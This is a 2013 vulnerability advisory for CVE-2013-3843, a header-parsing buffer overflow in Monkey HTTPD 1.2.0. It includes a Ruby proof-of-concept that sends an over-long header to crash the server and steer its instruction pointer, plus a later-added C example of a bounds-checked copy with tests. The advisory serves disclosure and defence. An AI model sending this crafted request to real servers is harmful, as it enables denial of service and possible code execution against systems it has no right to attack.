SECURITYVULNS:DOC:29449
Jun 04, 2013 - 12:00 a.m.

CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution

vulners.com
  1. Title

    CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
    Vulnerability With Possible Arbitrary Code Execution

  2. Introduction

    Monkey is a lightweight and powerful web server for
    GNU/Linux.

    It has been designed to be very scalable with low memory
    and CPU consumption, the perfect solution for embedded
    devices. Made for ARM, x86 and x64.

  3. Abstract

    A specially crafted request sent to the Monkey HTTPD
    server triggers a buffer overflow which can be used to
    control the flow of execution.

  4. Report Timeline

    2013-05-29
    Discovered vulnerability via fuzzing
    2013-05-30
    Vendor Notification

  5. Status

    Published

  6. Affected Products

    Monkey HTTPD <= 1.2.0

  7. Exploitation Technique

    Remote

  8. Details

    Improper bounds checking while parsing headers allows an
    attacker to craft a request that triggers a buffer
    overflow during a call to memcpy() on line 268 of
    mk_request.c.
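As an added illustration, not Monkey's code and not the fix from the project's bug tracker, the following hypothetical header-value copy shows the bounds check whose absence produces the memcpy() overflow described above. Function names, the 64-byte buffer size and the inputs (including a 2511-byte value shaped like the one in the proof of concept) are constructed for this example.

```c
#include <string.h>

#define HDR_VALUE_MAX 64   /* constructed fixed-size header value buffer */

/* Hypothetical header parser, not Monkey's mk_request.c. Copies the value
 * of a "Name: value" line into dst only when it fits, returning the value
 * length or -1 for a malformed line or a value that would overflow dst.
 * The bug class in the advisory is the unchecked form of the same step:
 * memcpy(dst, val, val_len) with no comparison against dst_size. */
int copy_header_value(const char *line, size_t line_len,
                      char *dst, size_t dst_size)
{
    const char *sep = memchr(line, ':', line_len);
    if (sep == NULL || dst_size == 0)
        return -1;
    const char *val = sep + 1;
    size_t val_len = line_len - (size_t)(val - line);
    while (val_len > 0 && (*val == ' ' || *val == '\t')) {  /* skip OWS */
        val++;
        val_len--;
    }
    if (val_len >= dst_size)      /* bounds check, room for the NUL too */
        return -1;
    memcpy(dst, val, val_len);
    dst[val_len] = '\0';
    return (int)val_len;
}

/* Constructed well-formed header: the value is copied intact. */
int host_header_copied(void)
{
    char dst[HDR_VALUE_MAX];
    return copy_header_value("Host: localhost", 15, dst, sizeof dst) == 9
        && strcmp(dst, "localhost") == 0;
}

/* Constructed over-long header shaped like the advisory's "Bad: " line
 * (2511 bytes of 'A'): it must be rejected and dst left untouched. */
int oversized_header_is_rejected(void)
{
    static char line[5 + 2511];
    char dst[HDR_VALUE_MAX] = "untouched";
    memcpy(line, "Bad: ", 5);
    memset(line + 5, 'A', 2511);
    int rc = copy_header_value(line, sizeof line, dst, sizeof dst);
    return rc == -1 && strcmp(dst, "untouched") == 0;
}
```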

  9. Proof of Concept

    The vulnerability can be exploited by a remote attacker
    without any special privileges. Under Ubuntu 13.04, an
    offset of 2511 lines up the instruction pointer with
    0x42424242.

    #!/usr/bin/env ruby

    require "socket"

    host = "localhost"
    port = 2001

    s = TCPSocket.open(host, port)

    # Request line, an empty Host header, a stray "localhost" line,
    # then the over-long "Bad" header that overflows the buffer.
    buf = "GET / HTTP/1.1\r\n"
    buf << "Host: " + "\r\n"
    buf << "localhost\r\n"
    buf << "Bad: "
    buf << "A" * 2511   # filler up to the 2511-byte offset
    buf << "B" * 4      # 0x42424242 lands in the instruction pointer

    s.puts(buf)
    s.close

  10. Solution

    There is currently no solution.

  11. Risk

    Risk should be considered high since it can be shown that
    the flow of execution can be controlled by an attacker.

  12. References

    http://bugs.monkey-project.com/ticket/182

  13. Credits

    Doug Prostko <dougtko[at]gmail[dot]com>
    Vulnerability discovery